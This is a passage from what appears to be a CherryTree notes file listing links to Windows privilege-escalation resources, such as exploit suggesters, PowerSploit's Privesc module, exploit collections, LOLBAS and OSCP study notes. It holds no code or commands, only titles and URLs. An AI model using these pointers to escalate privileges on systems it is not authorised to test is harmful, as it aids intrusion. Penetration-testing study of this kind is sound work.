<rich_text> </rich_text>
<rich_text link="webs https://github.com/GDSSecurity/Windows-Exploit-Suggester">https://github.com/GDSSecurity/Windows-Exploit-Suggester</rich_text>
<rich_text>
•</rich_text>
<rich_text weight="heavy"> winprivesc</rich_text>
<rich_text>: </rich_text>
<rich_text link="webs https://github.com/joshruppe/winprivesc">https://github.com/joshruppe/winprivesc</rich_text>
<rich_text>
• </rich_text>
<rich_text weight="heavy">Windows Privilege Escalation Guide:</rich_text>
<rich_text> </rich_text>
<rich_text link="webs https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/">https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/</rich_text>
<rich_text>
• </rich_text>
<rich_text weight="heavy">Windows-Privesc:</rich_text>
<rich_text> </rich_text>
<rich_text link="webs https://github.com/togie6/Windows-Privesc">https://github.com/togie6/Windows-Privesc</rich_text>
<rich_text>
• </rich_text>
<rich_text weight="heavy">WindowsExploits:</rich_text>
<rich_text> </rich_text>
<rich_text link="webs https://github.com/abatchy17/WindowsExploits">https://github.com/abatchy17/WindowsExploits</rich_text>
<rich_text>
• </rich_text>
<rich_text weight="heavy">PowerSploit:</rich_text>
<rich_text> </rich_text>
<rich_text link="webs https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc">https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc</rich_text>
<rich_text>
• </rich_text>
<rich_text weight="heavy">Windows EoP:</rich_text>
<rich_text> </rich_text>
<rich_text link="webs https://guif.re/windowseop">https://guif.re/windowseop</rich_text>
<rich_text>
• </rich_text>
<rich_text weight="heavy">OSCP Notes:</rich_text>
<rich_text> </rich_text>
<rich_text link="webs https://securism.wordpress.com/oscp-notes-privilege-escalation-windows/">https://securism.wordpress.com/oscp-notes-privilege-escalation-windows/</rich_text>
<rich_text>
• </rich_text>
<rich_text weight="heavy">PrivEsc Binaries:</rich_text>
<rich_text> </rich_text>
<rich_text link="webs https://lolbas-project.github.io/">https://lolbas-project.github.io/</rich_text>
</node>
</node>
</cherrytree>